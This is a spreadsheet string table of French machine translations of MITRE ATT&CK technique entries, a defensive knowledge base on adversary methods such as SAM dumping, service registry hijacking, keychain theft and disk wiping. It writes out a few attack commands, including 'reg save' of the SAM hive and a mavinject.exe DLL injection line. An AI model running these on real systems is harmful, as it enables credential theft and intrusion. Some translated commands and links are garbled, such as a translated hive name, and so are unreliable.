Un certain nombre d’outils peuvent être utilisés pour récupérer le fichier SAM grâce à des techniques en mémoire :
* pwdumpx.exe
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternativement, le SAM peut être extrait du registre avec Reg :
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\système système&lt;/code&gt;
Creddump7 peut ensuite être utilisé pour traiter la base de données SAM localement afin de récupérer les hachages. (Citation : GitHub Creddump7)
Notes: 
* Le compte RID 500 est l’administrateur local intégré.
* Le RID 501 est le compte invité.
* Les comptes d’utilisateurs commencent avec un RID de 1 000+.
https://attack.mitre.org/techniques/T1003/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans les données WHOIS publiques des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les données WHOIS sont stockées par les registres Internet régionaux (RIR) chargés de l’allocation et de l’attribution des ressources Internet telles que les noms de domaine. N’importe qui peut interroger les serveurs WHOIS pour obtenir des informations sur un domaine enregistré, telles que les blocs d’adresses IP attribués, les informations de contact et les serveurs de noms DNS. (Citation : WHOIS)
Les adversaires peuvent rechercher des données WHOIS pour recueillir des informations exploitables. Les acteurs de la menace peuvent utiliser des ressources en ligne ou des utilitaires de ligne de commande pour piller les données WHOIS à la recherche d’informations sur les victimes potentielles. Les informations provenant de ces sources peuvent révéler des opportunités pour d’autres formes de reconnaissance (ex : [Analyse active](https://attack.mitre.org/techniques/T1595) ou [Phishing pour obtenir des informations](https://attack.mitre.org/techniques/T1598)), l’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le microprogramme du système pour qu’il persiste sur les systèmes. Le BIOS (Basic Input/Output System) et l’interface UEFI (Unified Extensible Firmware Interface) ou EFI (Extensible Firmware Interface) sont des exemples de microprogramme système qui fonctionnent comme l’interface logicielle entre le système d’exploitation et le matériel d’un ordinateur. (Citation : BIOS de Wikipédia)(Citation : Wikipédia UEFI)(Citation : À propos de l’UEFI)
Les microprogrammes système tels que le BIOS et l’EFI sont à la base des fonctionnalités d’un ordinateur et peuvent être modifiés par un adversaire pour effectuer ou participer à des activités malveillantes. Il est possible d’écraser le micrologiciel du système, ce qui peut donner à des adversaires sophistiqués un moyen d’installer des mises à jour de microprogramme malveillantes comme moyen de persistance sur un système qui peut être difficile à détecter.
https://attack.mitre.org/techniques/T1542/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des sites Web appartenant à la victime à la recherche d’informations qui peuvent être utilisées lors du ciblage. Les sites Web appartenant aux victimes peuvent contenir divers détails, notamment les noms des services ou des divisions, les emplacements physiques et des données sur les employés clés, comme les noms, les rôles et les coordonnées (p. ex. : [Adresses e-mail](https://attack.mitre.org/techniques/T1589/002)). Ces sites peuvent également contenir des détails mettant en évidence les opérations et les relations commerciales. (Citation : Fuite Comparitech)
Les adversaires peuvent effectuer des recherches sur des sites Web appartenant à des victimes pour recueillir des informations exploitables. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Phishing for Information](https://attack.mitre.org/techniques/T1598) ou [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), d’établissement de ressources opérationnelles (ex : [Établissement de comptes](https://attack.mitre.org/techniques/T1585) ou [Compromission de comptes](https://attack.mitre.org/techniques/T1586)), et/ou d’accès initial (ex : [Trusted Relation](https://attack.mitre.org/techniques/T1199) ou [Hameçonnage](https://attack.mitre.org/techniques/T1566)).
En plus de naviguer manuellement sur le site Web, les adversaires peuvent tenter d’identifier des répertoires ou des fichiers cachés qui pourraient contenir des informations sensibles supplémentaires ou des fonctionnalités vulnérables. Ils peuvent le faire par le biais d’activités automatisées telles que [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003), ainsi qu’en exploitant des fichiers tels que sitemap.xml et robots.txt. (Citation : Perez sitemap XML 2023)(Citation : Registre des robots TXT 2015)
https://attack.mitre.org/techniques/T1594</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter de trouver des groupes de cloud et des paramètres d’autorisation. La connaissance des groupes d’autorisations cloud peut aider les adversaires à déterminer les rôles particuliers des utilisateurs et des groupes au sein d’un environnement, ainsi que les utilisateurs associés à un groupe particulier.
Avec l’accès authentifié, il existe plusieurs outils qui peuvent être utilisés pour trouver des groupes d’autorisations. L’applet de commande &lt;code&gt;PowerShell Get-MsolRole&lt;/code&gt; peut être utilisée pour obtenir des rôles et des groupes d’autorisations pour les comptes Exchange et Office 365 (Référence : Microsoft Msolrole) (Référence : GitHub Raindance).
Azure CLI (AZ CLI) et l’API du fournisseur d’identité Google Cloud fournissent également des interfaces permettant d’obtenir des groupes d’autorisations. La commande &lt;code&gt;az ad user get-member-groups&lt;/code&gt; répertorie les groupes associés à un compte d’utilisateur pour Azure, tandis que le point de terminaison &lt;code&gt;d’API GET https://cloudidentity.googleapis.com/v1/groups&lt;/code&gt; répertorie les ressources de groupe disponibles pour un utilisateur pour Google. (Citation : Microsoft AZ CLI)(Citation : Black Hills Red Teaming MS AD Azure, 2018)(Citation : Documentation de l’API Google Cloud Identity) Dans AWS, les commandes « ListRolePolicies » et « ListAttachedRolePolicies » permettent aux utilisateurs d’énumérer les stratégies attachées à un rôle. (Citation : Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)
Les adversaires peuvent tenter de répertorier les listes de contrôle d’accès des objets afin de déterminer le propriétaire et d’autres comptes ayant accès à l’objet, par exemple, via l’API AWS &lt;code&gt;GetBucketAcl&lt;/code&gt; (citation : AWS Get Bucket ACL). À l’aide de ces informations, un adversaire peut cibler des comptes disposant d’autorisations sur un objet donné ou exploiter des comptes qu’il a déjà compromis pour accéder à l’objet.
https://attack.mitre.org/techniques/T1069/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant les entrées de registre utilisées par les services. Les adversaires peuvent utiliser des failles dans les autorisations des clés de registre liées aux services pour rediriger de l’exécutable spécifié à l’origine vers un exécutable qu’ils contrôlent, afin de lancer leur propre code au démarrage d’un service. Windows stocke les informations de configuration du service local dans le registre sous &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. Les informations stockées sous les clés de registre d’un service peuvent être manipulées pour modifier les paramètres d’exécution d’un service à l’aide d’outils tels que le contrôleur de service, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001) ou [Reg](https://attack.mitre.org/software/S0075). L’accès aux clés de registre est contrôlé par le biais de listes de contrôle d’accès et d’autorisations utilisateur. (Citation : Sécurité de la clé de registre)(Citation : malware_hides_service)
Si les autorisations pour les utilisateurs et les groupes ne sont pas correctement définies et ne permettent pas l’accès aux clés de registre d’un service, les adversaires peuvent modifier le binPath/ImagePath du service pour pointer vers un autre exécutable sous leur contrôle. Lorsque le service démarre ou est redémarré, le programme contrôlé par l’adversaire s’exécute, ce qui permet à l’adversaire d’établir la persistance et/ou l’élévation de privilèges vers le contexte de compte sous lequel le service est configuré pour s’exécuter (compte local/de domaine, SYSTEM, LocalService ou NetworkService).
Les adversaires peuvent également modifier d’autres clés de registre dans l’arborescence du registre du service. Par exemple, la touche &lt;code&gt;FailureCommand&lt;/code&gt; peut être modifiée afin que le service soit exécuté dans un contexte élevé chaque fois qu’il échoue ou qu’il est intentionnellement endommagé. (Citation : Collectionneurs liés au Kansa Service)(Citation : Faiblesse des permanentes du registre des tweets)
La clé &lt;code&gt;Performance&lt;/code&gt; contient le nom de la DLL de performance d’un service de pilote et les noms de plusieurs fonctions exportées dans la DLL. (Référence : microsoft_services_registry_tree) Si la clé &lt;code&gt;de performance&lt;/code&gt; n’est pas déjà présente et si un utilisateur contrôlé par l’adversaire dispose de l’autorisation &lt;code&gt;Créer une sous-clé&lt;/code&gt;, les adversaires peuvent créer la clé &lt;code&gt;de performance&lt;/code&gt; dans l’arborescence du registre du service pour pointer vers une DLL malveillante. (Référence : insecure_reg_perms)
Les adversaires peuvent également ajouter la clé &lt;code&gt;Parameters&lt;/code&gt;, qui stocke des données spécifiques au pilote, ou d’autres sous-clés personnalisées pour leurs services malveillants afin d’établir la persistance ou d’activer d’autres activités malveillantes. (Référence : microsoft_services_registry_tree)(Référence : troj_zegost) De plus, si des adversaires lancent leurs services malveillants à l’aide de svchost.exe, le fichier du service peut être identifié à l’aide &lt;code&gt;de HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\servicename\Parameters\ServiceDll&lt;/code&gt;. (Citation : malware_hides_service)
https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans les données DNS des informations sur les victimes qui peuvent être utilisées lors du ciblage. Les informations DNS peuvent inclure divers détails, y compris des serveurs de noms enregistrés ainsi que des enregistrements qui décrivent l’adressage pour les sous-domaines, les serveurs de messagerie et autres hôtes d’une cible.
Les adversaires peuvent rechercher des données DNS pour recueillir des informations exploitables. Les acteurs malveillants peuvent interroger directement les serveurs de noms d’une organisation cible ou effectuer des recherches dans des référentiels centralisés de réponses aux requêtes DNS enregistrées (appelées DNS passifs). (Citation : benne à ordures DNS)(Citation : Circl DNS passif) Les adversaires peuvent également rechercher et cibler les erreurs de configuration/fuites DNS qui révèlent des informations sur les réseaux internes. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Rechercher des sites Web appartenant à la victime](https://attack.mitre.org/techniques/T1594) ou [Rechercher des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établir des ressources opérationnelles (ex : [Acquérir l’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromettre l’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou un accès initial (ex : [Externe à distance Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler des fonctionnalités gourmandes en ressources des applications pour provoquer un déni de service (DoS), privant ainsi ces applications de leur disponibilité. Par exemple, des fonctionnalités spécifiques dans les applications Web peuvent être très gourmandes en ressources. Des requêtes répétées adressées à ces fonctionnalités peuvent épuiser les ressources système et refuser l’accès à l’application ou au serveur lui-même. (Citation : Arbor AnnualDoSreport janvier 2018)
https://attack.mitre.org/techniques/T1499/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent manipuler les dépendances logicielles et les outils de développement avant qu’ils ne soient reçus par un consommateur final dans le but de compromettre les données ou le système. Les applications dépendent souvent de logiciels externes pour fonctionner correctement. Les projets open source populaires qui sont utilisés comme dépendances dans de nombreuses applications peuvent être ciblés comme moyen d’ajouter du code malveillant aux utilisateurs de la dépendance. (Citation : Compromis NPM de Trendmicro)  
Le ciblage peut être spécifique à un ensemble de victimes souhaitées ou peut être distribué à un large éventail de consommateurs, mais ne passer qu’à des tactiques supplémentaires visant des victimes spécifiques.
https://attack.mitre.org/techniques/T1195/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent acheter et/ou voler des certificats SSL/TLS qui peuvent être utilisés lors du ciblage. Les certificats SSL/TLS sont conçus pour instaurer la confiance. Il s’agit notamment d’informations sur la clé, d’informations sur l’identité de son propriétaire et de la signature numérique d’une entité qui a vérifié que le contenu du certificat est correct. Si la signature est valide et que la personne qui examine le certificat fait confiance au signataire, elle sait qu’elle peut utiliser cette clé pour communiquer avec son propriétaire.
Les adversaires peuvent acheter ou voler des certificats SSL/TLS pour poursuivre leurs opérations, telles que le chiffrement du trafic C2 (ex : [Cryptographie asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)) ou même l’activation de [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) si le certificat est approuvé ou ajouté d’une autre manière à la racine de confiance (c’est-à-dire [Installer le certificat racine]( https://attack.mitre.org/techniques/T1553/004)). L’achat de certificats numériques peut être effectué à l’aide d’une organisation de façade ou à l’aide d’informations volées à une entité précédemment compromise qui permettent à l’adversaire de valider auprès d’un fournisseur de certificats en tant qu’entité telle qu’elle est dans le même temps. Les adversaires peuvent également voler des documents de certificat directement auprès d’un tiers compromis, y compris auprès des autorités de certification. (Citation : DiginotarCompromise) Les adversaires peuvent enregistrer ou détourner des domaines pour lesquels ils achèteront ultérieurement un certificat SSL/TLS.
Il existe des autorités de certification qui permettent aux adversaires d’acquérir gratuitement des certificats SSL/TLS, tels que des certificats de validation de domaine. (Citation : FAQ sur Let’s Encrypt)
Après avoir obtenu un certificat numérique, un adversaire peut ensuite installer ce certificat (voir [Installer un certificat numérique](https://attack.mitre.org/techniques/T1608/003)) sur l’infrastructure sous son contrôle.
https://attack.mitre.org/techniques/T1588/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent configurer leurs propres serveurs DNS (Domain Name System) qui peuvent être utilisés lors du ciblage. Au cours de l’activité post-compromission, les adversaires peuvent utiliser le trafic DNS pour diverses tâches, notamment pour la commande et le contrôle (ex : [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Au lieu de détourner les serveurs DNS existants, les adversaires peuvent choisir de configurer et d’exécuter leurs propres serveurs DNS pour soutenir les opérations.
En exécutant leurs propres serveurs DNS, les adversaires peuvent avoir plus de contrôle sur la façon dont ils administrent le trafic DNS C2 côté serveur ([DNS](https://attack.mitre.org/techniques/T1071/004)). En contrôlant un serveur DNS, les adversaires peuvent configurer des applications DNS pour fournir des réponses conditionnelles aux logiciels malveillants et, généralement, disposer d’une plus grande flexibilité dans la structure du canal C2 basé sur DNS. (Citation : Unit42 DNS mars 2019)
https://attack.mitre.org/techniques/T1583/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent effacer ou corrompre les données brutes du disque sur des systèmes spécifiques ou en grand nombre dans un réseau pour interrompre la disponibilité des ressources système et réseau. Avec un accès direct en écriture à un disque, les adversaires peuvent tenter d’écraser des parties des données du disque. Les adversaires peuvent choisir d’effacer des parties arbitraires des données du disque et/ou d’effacer les structures de disque comme l’enregistrement de démarrage principal (MBR). Une tentative d’effacement complet de tous les secteurs du disque peut être tentée.
Pour maximiser l’impact sur l’organisation cible dans les opérations où l’interruption de la disponibilité à l’échelle du réseau est l’objectif, les programmes malveillants utilisés pour effacer les disques peuvent avoir des fonctionnalités de type ver pour se propager sur un réseau en exploitant des techniques supplémentaires telles que [Comptes valides](https://attack.mitre.org/techniques/T1078), [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) et [Partages SMB/Windows Admin](https://attack.mitre.org/techniques/T1021/002). (Citation : Logiciel malveillant destructeur Novetta Blockbuster)
Sur les périphériques réseau, les adversaires peuvent effacer les fichiers de configuration et d’autres données du périphérique à l’aide de commandes telles que « effacer » (https://attack.mitre.org/techniques/T1059/008 de l’interface de ligne de commande [Network Device CLI](. (Référence : erase_cmd_cisco)
https://attack.mitre.org/techniques/T1561</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide du protocole de couche application DNS (Domain Name System) pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Le protocole DNS remplit une fonction administrative dans les réseaux informatiques et peut donc être très courant dans les environnements. Le trafic DNS peut également être autorisé avant même que l’authentification réseau ne soit terminée. Les paquets DNS contiennent de nombreux champs et en-têtes dans lesquels les données peuvent être dissimulées. Souvent connu sous le nom de tunneling DNS, les adversaires peuvent abuser du DNS pour communiquer avec les systèmes sous leur contrôle au sein d’un réseau victime tout en imitant le trafic normal et attendu. (Citation : Tunneling DNS PAN)(Citation : Medium DnsTunneling)
https://attack.mitre.org/techniques/T1071/004</t>
  </si>
  <si>
    <t>Les adversaires peuvent tenter d’accéder à l’API Cloud Instance Metadata pour collecter des informations d’identification et d’autres données sensibles.
La plupart des fournisseurs de services cloud prennent en charge une API de métadonnées d’instance cloud, qui est un service fourni aux instances virtuelles en cours d’exécution qui permet aux applications d’accéder aux informations sur l’instance virtuelle en cours d’exécution. Les informations disponibles incluent généralement le nom, le groupe de sécurité et des métadonnées supplémentaires, y compris des données sensibles telles que des informations d’identification et des scripts UserData qui peuvent contenir des secrets supplémentaires. L’API de métadonnées d’instance est fournie à titre pratique pour faciliter la gestion des applications et est accessible à toute personne pouvant accéder à l’instance. (Référence : API de métadonnées d’instance AWS) Une API de métadonnées cloud a été utilisée dans au moins une compromission de haut niveau. (Citation : Krebs Capital One, août 2019)
Si des adversaires sont présents sur l’instance virtuelle en cours d’exécution, ils peuvent interroger directement l’API de métadonnées d’instance pour identifier les informations d’identification qui permettent d’accéder à des ressources supplémentaires. De plus, les adversaires peuvent exploiter une vulnérabilité SSRF (Server-Side Request Forgery) dans un proxy Web public qui leur permet d’accéder aux informations sensibles via une requête adressée à l’API de métadonnées d’instance. (Citation : API de métadonnées d’instance RedLock 2018)
La norme de facto pour les fournisseurs de services cloud est d’héberger l’API de métadonnées d’instance à l’adresse &lt;code&gt;http[ :]//169.254.169.254&lt;/code&gt;.
https://attack.mitre.org/techniques/T1552/005</t>
  </si>
  <si>
    <t>Un adversaire disposant d’un accès root peut collecter des informations d’identification en lisant la mémoire de « securityd ». 'Securityd' est un service/démon responsable de la mise en œuvre de protocoles de sécurité tels que le cryptage et l’autorisation. (Citation : Apple Dev SecurityD) Un adversaire privilégié peut être en mesure d’analyser la mémoire de « securityd » pour trouver la séquence de clés correcte afin de déchiffrer le trousseau de connexion de l’utilisateur. Cela peut fournir à l’adversaire divers mots de passe en texte brut, tels que ceux des utilisateurs, du WiFi, de la messagerie, des navigateurs, des certificats, des notes sécurisées, etc. (Citation : OS X Keychain)
Dans OS X antérieur à El Capitan, les utilisateurs disposant d’un accès root peuvent lire les mots de passe du trousseau en texte brut des utilisateurs connectés, car l’implémentation du trousseau d’Apple permet de mettre en cache ces informations d’identification afin que les utilisateurs ne soient pas invités à saisir leurs mots de passe à plusieurs reprises. (Citation : Porte-clés OS X)(citation : externe à DA, à la manière d’OS X) L’utilitaire « sécurisé » d’Apple prend le mot de passe de connexion de l’utilisateur, le crypte avec PBKDF2 et stocke cette clé principale en mémoire. Apple utilise également un ensemble de clés et d’algorithmes pour chiffrer le mot de passe de l’utilisateur, mais une fois la clé principale trouvée, un adversaire n’a qu’à itérer sur les autres valeurs pour déverrouiller le mot de passe final. (Citation : Porte-clés OS X)
https://attack.mitre.org/techniques/T1555/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent recueillir des informations sur les paramètres de stratégie de groupe afin d’identifier les chemins d’accès à l’élévation des privilèges, les mesures de sécurité appliquées au sein d’un domaine et de découvrir des modèles dans les objets du domaine qui peuvent être manipulés ou utilisés pour se fondre dans l’environnement. La stratégie de groupe permet une gestion centralisée des paramètres de l’utilisateur et de l’ordinateur dans Active Directory (AD). Les objets de stratégie de groupe (GPO) sont des conteneurs pour les paramètres de stratégie de groupe composés de fichiers stockés dans un chemin d’accès réseau prévisible '\&lt;DOMAIN&gt;\SYSVOL\&lt;DOMAIN&gt;\Policies\'.( Citation : Principes de base de la politique de groupe TechNet (Citation : ADSecurity GPO Persistence 2016)
Les adversaires peuvent utiliser des commandes telles que &lt;code&gt;gpresult&lt;/code&gt; ou diverses fonctions PowerShell accessibles publiquement, telles que &lt;code&gt;Get-DomainGPO&lt;/code&gt; et &lt;code&gt;Get-DomainGPOLocalGroup&lt;/code&gt;, pour collecter des informations sur les paramètres de stratégie de groupe. (Citation : Microsoft gpresult)(Citation : Github PowerShell Empire) Les adversaires peuvent utiliser ces informations pour façonner des comportements ultérieurs, notamment pour déterminer les chemins d’attaque potentiels au sein du réseau cible, ainsi que les possibilités de manipuler les paramètres de stratégie de groupe (c’est-à-dire [Modification de la politique de domaine ou de locataire](https://attack.mitre.org/techniques/T1484)) à leur avantage.
https://attack.mitre.org/techniques/T1615</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser des bootkits pour persister sur les systèmes. Les bootkits résident à une couche inférieure au système d’exploitation et peuvent rendre difficile l’exécution d’une correction complète, à moins qu’une organisation ne soupçonne qu’un tel kit a été utilisé et ne puisse agir en conséquence.
Un bootkit est une variante d’un logiciel malveillant qui modifie les secteurs d’amorçage d’un disque dur, y compris le Master Boot Record (MBR) et le Volume Boot Record (VBR). (Citation : Mandiant M Trends 2016) Le MBR est la section du disque qui est chargée en premier après l’initialisation du matériel par le BIOS. Il s’agit de l’emplacement du chargeur de démarrage. Un adversaire qui dispose d’un accès brut au lecteur de démarrage peut écraser cette zone, détournant l’exécution au démarrage du chargeur de démarrage normal vers le code de l’adversaire. (Citation : Lau 2011)
Le MBR transmet le contrôle du processus de démarrage au VBR. Comme dans le cas de MBR, un adversaire qui dispose d’un accès brut au lecteur de démarrage peut écraser le VBR pour détourner l’exécution au démarrage vers le code adversaire.
https://attack.mitre.org/techniques/T1542/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher des supports amovibles connectés sur des ordinateurs qu’ils ont compromis pour trouver des fichiers qui les intéressent. Les données sensibles peuvent être collectées à partir de n’importe quel support amovible (lecteur de disque optique, clé USB, etc.) connecté au système compromis avant l’exfiltration. Des shells de commande interactifs peuvent être utilisés, et des fonctionnalités communes à [cmd](https://attack.mitre.org/software/S0106) peuvent être utilisées pour collecter des informations. 
Certains adversaires peuvent également utiliser [Collecte automatisée](https://attack.mitre.org/techniques/T1119) sur des supports amovibles.
https://attack.mitre.org/techniques/T1025</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser de l’exécution de code malveillant mavinject.exe au proxy. Mavinject.exe s’agit de l’injecteur de virtualisation d’applications Microsoft, un utilitaire Windows qui peut injecter du code dans des processus externes dans le cadre de la virtualisation d’applications Microsoft (App-V). (Citation : LOLBAS Mavinject)
Les adversaires peuvent abuser de mavinject.exe pour injecter des DLL malveillantes dans les processus en cours d’exécution (par exemple, [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001)), permettant l’exécution arbitraire de code (par exemple, &lt;code&gt;C :\Windows\system32\mavinject.exe PID /INJECTRUNNING PATH_DLL&lt;/code&gt;). (Citation : ATT Lazarus TTP Evolution)(Citation : Reaqta Mavinject) Étant donné que mavinject.exe peuvent être signées numériquement par Microsoft, l’exécution par proxy via cette méthode peut échapper à la détection par les produits de sécurité, car l’exécution est masquée dans le cadre d’un processus légitime. 
En plus de [Dynamic-link Library Injection](https://attack.mitre.org/techniques/T1055/001), Mavinject.exe peut également être utilisé de manière abusive pour effectuer l’injection de descripteurs d’importation via son paramètre &lt;code&gt;de ligne de commande /HMODULE&lt;/code&gt; (par exemple, &lt;code&gt;mavinject.exe PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER&lt;/code&gt;). Cette commande injecterait une entrée de table d’importation composée de la DLL spécifiée dans le module à l’adresse de base donnée. (Citation : Fonctionnalité Mavinject déconstruite)
https://attack.mitre.org/techniques/T1218/013</t>
  </si>
  <si>
    <t>Les adversaires peuvent regrouper les données collectées dans un emplacement central ou un répertoire sur le système local avant l’exfiltration. Les données peuvent être conservées dans des fichiers distincts ou combinées en un seul fichier grâce à des techniques telles que [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Des shells de commande interactifs peuvent être utilisés, et des fonctionnalités communes à [cmd](https://attack.mitre.org/software/S0106) et bash peuvent être utilisées pour copier des données dans un emplacement de stockage.
Les adversaires peuvent également regrouper les données collectées dans divers formats/emplacements disponibles d’un système, y compris les bases de données/référentiels de stockage locaux ou le registre Windows. (Citation : Prevailion DarkWatchman 2021)
https://attack.mitre.org/techniques/T1074/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent correspondre ou se rapprocher du nom ou de l’emplacement de fichiers ou de ressources légitimes lorsqu’ils les nomment/placent. Ceci est fait dans le but d’échapper aux défenses et à l’observation. Cela peut être fait en plaçant un exécutable dans un répertoire de confiance commune (ex : sous System32) ou en lui donnant le nom d’un programme légitime et fiable (ex : svchost.exe). Dans les environnements conteneurisés, cela peut également être fait en créant une ressource dans un espace de noms qui correspond à la convention de nommage d’un pod ou d’un cluster de conteneur. Alternativement, un nom de fichier ou d’image de conteneur donné peut être une approximation proche de programmes/images légitimes ou quelque chose d’inoffensif.
Les adversaires peuvent également utiliser la même icône que celle du fichier qu’ils essaient d’imiter.
https://attack.mitre.org/techniques/T1036/005</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des certificats SSL/TLS auto-signés qui peuvent être utilisés lors du ciblage. Les certificats SSL/TLS sont conçus pour instaurer la confiance. Il s’agit notamment d’informations sur la clé, d’informations sur l’identité de son propriétaire et de la signature numérique d’une entité qui a vérifié que le contenu du certificat est correct. Si la signature est valide et que la personne qui examine le certificat fait confiance au signataire, elle sait qu’elle peut utiliser cette clé pour communiquer avec son propriétaire. Dans le cas de l’auto-signature, les certificats numériques ne disposent pas de l’élément de confiance associé à la signature d’une autorité de certification (CA) tierce.
Les adversaires peuvent créer des certificats SSL/TLS auto-signés qui peuvent être utilisés pour poursuivre leurs opérations, telles que le chiffrement du trafic C2 (ex : [Chiffrement asymétrique](https://attack.mitre.org/techniques/T1573/002) avec [Protocoles Web](https://attack.mitre.org/techniques/T1071/001)) ou même l’activation de [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) s’ils sont ajoutés à la racine de confiance (c’est-à-dire [Installer le certificat racine](https://attack.mitre.org/techniques/T1553/004)).
Après avoir créé un certificat numérique, un adversaire peut ensuite installer ce certificat (voir [Installer un certificat numérique](https://attack.mitre.org/techniques/T1608/003)) sur l’infrastructure sous son contrôle.
https://attack.mitre.org/techniques/T1587/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent insérer, supprimer ou manipuler des données au repos afin d’influencer des résultats externes ou de cacher des activités, menaçant ainsi l’intégrité des données. (Citation : FireEye APT38 octobre 2018)(Citation : DOJ Lazarus Sony 2018) En manipulant les données stockées, les adversaires peuvent tenter d’affecter un processus métier, la compréhension organisationnelle et la prise de décision.
Les données stockées peuvent inclure divers formats de fichiers, tels que des fichiers Office, des bases de données, des e-mails stockés et des formats de fichiers personnalisés. Le type de modification et l’impact qu’elle aura dépendent du type de données ainsi que des buts et objectifs de l’adversaire. Pour les systèmes complexes, un adversaire aurait probablement besoin d’une expertise particulière et peut-être d’un accès à des logiciels spécialisés liés au système, ce qui serait généralement obtenu par le biais d’une campagne de collecte d’informations prolongée afin d’avoir l’impact souhaité.
https://attack.mitre.org/techniques/T1565/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent utiliser le craquage de mot de passe pour tenter de récupérer des informations d’identification utilisables, telles que des mots de passe en texte brut, lorsque des éléments d’identification tels que des hachages de mot de passe sont obtenus. [Vidage des informations d’identification du système d’exploitation](https://attack.mitre.org/techniques/T1003) peut être utilisé pour obtenir des hachages de mot de passe, cela ne peut obtenir un adversaire que jusqu’à présent lorsque [Passer le hachage](https://attack.mitre.org/techniques/T1550/002) n’est pas une option. De plus, les adversaires peuvent exploiter [Data from Configuration Repository](https://attack.mitre.org/techniques/T1602) afin d’obtenir des informations d’identification hachées pour les périphériques réseau. (Référence : US-CERT-TA18-106A) 
Des techniques permettant de deviner systématiquement les mots de passe utilisés pour calculer les hachages sont disponibles, ou l’adversaire peut utiliser une table arc-en-ciel précalculée pour craquer les hachages. Le craquage des hachages est généralement effectué sur des systèmes contrôlés par l’adversaire en dehors du réseau cible. (Citation : Wikipédia Craquage de mot de passe) Le mot de passe en texte brut résultant d’un hachage réussi peut être utilisé pour se connecter aux systèmes, ressources et services auxquels le compte a accès.
https://attack.mitre.org/techniques/T1110/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent cibler les e-mails des utilisateurs sur les systèmes locaux pour collecter des informations sensibles. Les fichiers contenant des données de courrier électronique peuvent être acquis à partir du système local d’un utilisateur, tel que le stockage Outlook ou les fichiers cache.
Outlook stocke les données localement dans des fichiers de données hors connexion avec l’extension .ost. Outlook 2010 et versions ultérieures prennent en charge des fichiers .ost d’une taille maximale de 50 Go, tandis que les versions antérieures d’Outlook prennent en charge jusqu’à 20 Go. (Citation : Tailles de fichier Outlook) Les comptes IMAP dans Outlook 2013 (et versions antérieures) et les comptes POP utilisent des fichiers de données Outlook (.pst) au lieu de .ost, tandis que les comptes IMAP dans Outlook 2016 (et versions ultérieures) utilisent des fichiers .ost. Les deux types de fichiers de données Outlook sont généralement stockés dans 'C :\Users\&lt;username&gt;\Documents\Outlook Files' ou 'C :\Users\&lt;username&gt;\AppData\Local\Microsoft\Outlook'.( Citation : Fichiers Microsoft Outlook)
https://attack.mitre.org/techniques/T1114/001</t>
  </si>
  <si>
    <t>Les adversaires peuvent obtenir des informations d’identification à partir du trousseau. Le trousseau (ou Services de trousseau) est le système de gestion des informations d’identification macOS qui stocke les noms de compte, les mots de passe, les clés privées, les certificats, les données d’application sensibles, les données de paiement et les notes sécurisées. Il existe trois types de trousseaux : le trousseau de connexion, le trousseau système et le trousseau d’éléments locaux (iCloud). Le trousseau par défaut est le trousseau de connexion, qui stocke les mots de passe et les informations des utilisateurs. Le trousseau système stocke les éléments auxquels le système d’exploitation accédait, tels que les éléments partagés entre les utilisateurs d’un hôte. Le trousseau d’articles locaux (iCloud) est utilisé pour les éléments synchronisés avec le service iCloud d’Apple. 
